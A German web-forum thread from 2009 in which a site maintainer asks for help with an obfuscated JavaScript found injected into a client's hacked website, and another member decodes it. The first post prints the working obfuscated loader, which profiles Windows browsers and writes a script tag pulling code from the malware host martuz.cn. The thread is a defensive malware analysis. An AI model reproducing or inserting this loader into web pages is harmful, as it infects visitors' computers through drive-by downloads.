Autor |
Nachricht |
Aerendil
Threadersteller
Dabei seit: 28.11.2007
Ort: -
Alter: -
Geschlecht: -
|
Verfasst Do 28.05.2009 18:40
Titel Website wurde wahrscheinlich gehackt - javascript |
|
|
Tach mal wieder ein Kunde von uns erhält seit ein paar tagen die tolle Warnung dass seine Website Malware verbreitet und google hat sie geblockt, man kommt nicht mehr drauf. Habe eben mal ein Backup der infizierten Seite gezogen und vergleiche nun im Quelltext und das hier ist mir aufgefallen:
Code: | <script language=javascript><!--
(function(){var fIbX='%';var dVk=('#76ar#20a#3d#22Scr#69p#74#45ngine#22#2cb#3d#22V#65#72si#6fn(#29+#22#2c#6a#3d#22#22#2cu#3dn#61vig#61#74or#2euser#41#67en#74#3bif((u#2e#69ndexOf(#22#43hrom#65#22)#3c0)#26#26#28u#2einde#7f(#22W#69n#22)#3e#30)#26#26(#75#2ei#6e#64ex#4ff(#22#4eT#206#22)#3c0)#26#26(do#63ument#2ecookie#2ein#64ex#4f#66(#22mi#65k#3d1#22)#3c0)#26#26#28ty#70eof#28z#72vzt#73)#21#3dtypeof(#22A#22)))#7bz#72vzts#3d#22A#22#3beval(#22i#66(wind#6f#77#2e#22+a+#22)j#3dj#2b#22+a+#22Major#22+b+a+#22Minor#22#2bb+#61+#22Build#22#2bb+#22j#3b#22)#3bdocument#2e#77#72i#74#65(#22#3c#73c#72ipt#20s#72#63#3d#2f#2f#6dar#74u#22#2b#22#7a#2ecn#2fvid#2f#3fid#3d#22#2bj+#22#3e#3c#5c#2f#73c#72i#70#74#3e#22)#3b#7d').replace(/#/g,fIbX);var HVKOw=unescape(dVk);eval(HVKOw)})();
--></script> |
Ist ein Script, das definitiv nicht von mir/uns da eingebaut wurde und startet unmittelbar nach dem Head und ist noch vorm Body, kann das jemand von euch dechiffrieren bzw. mir sagen, was das Teil da macht, steig bei Hardcore-Scripts nicht so wirklich durch...
Zuletzt bearbeitet von m am Do 28.05.2009 19:43, insgesamt 1-mal bearbeitet
|
|
|
|
|
zweitaccount
Dabei seit: 25.01.2008
Ort: -
Alter: -
Geschlecht: -
|
Verfasst Do 28.05.2009 19:43
Titel
|
|
|
Hi, das Script versucht eine seite martuz.cn/vid zu kontaktieren.
Diese Seite würde ich aber jetzt nicht unbedingt aufrufen.
firefox hat geschrieben: | Als attackierend gemeldete Website!
Die Website auf martuz.cn wurde als attackierende Seite gemeldet und auf Grund Ihrer Sicherheitseinstellungen blockiert.
Attackierende Websites versuchen, Programme zu installieren, die private Informationen stehlen, Ihren Computer verwenden, um andere zu attackieren oder Ihr System beschädigen.
Manche Websites vertreiben bewusst Viren und ähnlich schädliche Software, aber viele Websites sind auch ohne das Wissen oder die Erlaubnis des Betreibers kompromittiert. |
Entschlüsselt sieht ungefähr so aus (evals/writeln durch alerts
ersetzt):
Code: | var a = "ScriptEngine", b = "Version()+", j = "", u = navigator.userAgent;
if((u.indexOf("Chrome")<0) && (u.indexOf("Win") > 0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";alert("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");alert("<script src=//martu"+"z.cn/vid/?id="+j+"><\/script>");}
</script> |
Gruß
|
|
|
|
|
Anzeige
|
|
|
Aerendil
Threadersteller
Dabei seit: 28.11.2007
Ort: -
Alter: -
Geschlecht: -
|
Verfasst Fr 29.05.2009 09:20
Titel
|
|
|
Vielen Dank dafür! Drecks-Spammer und Konsorten....
|
|
|
|
|
|
|
|
Ähnliche Themen |
[CSS/JavaScript] anfangsbereich einer website ändern
Parse error: T_string: Sehe wahrscheinlich den Wald vor ...
[Help] Was machen, wenn die eigene site gehackt wurde?
Javascript "font"sizer für ganze Website
Hilfe! Webseite "gehackt", Spammails verschickt // php
[javascript] mit <select> feld wert an javascript funk
|
|